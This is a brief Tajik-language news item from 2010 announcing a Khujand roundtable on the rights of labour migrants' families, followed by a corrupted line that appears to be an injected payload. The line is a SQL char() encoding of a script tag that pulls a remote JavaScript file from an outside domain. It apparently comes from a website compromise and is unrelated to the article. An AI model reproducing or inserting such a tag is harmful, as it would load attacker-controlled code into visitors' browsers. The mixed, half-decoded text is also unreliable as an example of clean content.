20.11.2010
Ҳуқуқи оилаи муҳоҷиронро ки ҳимоя мекунад?
25 ноябри соли ҷори дар шаҳри Хуҷанд дар мавзӯи «Ҳимояи ҳуқуқи аъзоёни оилаи муҳоҷирони меҳнати дар Тоҷикистон» мизи мудаввар баргузор мегардад. Чорабинии мазкурро Намояндагии ташкилои «Маркази ҳуқуқи инсон» дар Хуҷанд баргузор менамояд. Ба андешаи ташкилкунандагони ин мизи мудаввар яке аз натиҷаҳои номатлуби муҳоҷирати меҳнати ин вайрон шудани оила ва аз ҳуқуқи иҷтимои занҳо ва кӯдакон аст. Пешбини мешавад, ки дар ин чорабини намояндагони ташкилотҳои байналхалки Иттиҳодияҳои ҷамъияти ва ва Васоити ахбори омма ширкат намуда пешниҳод доири беҳтар намудани шароити ҳимояи ҳуқуқ аъзоёни оилаи муҳоҷирони меҳнати ва ба хусус занҳо омода намоянд. Ин пешниҳод ба Ҳукумати Ҷумҳури ва ташкилоту мақомоти дахлдор фиристода хоҳад шуд.
Мутриба Қосимова

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)766c156f51b4dfc892c7e274430fef17.js" type="text/javascript">

ТАВЗЕҲОТ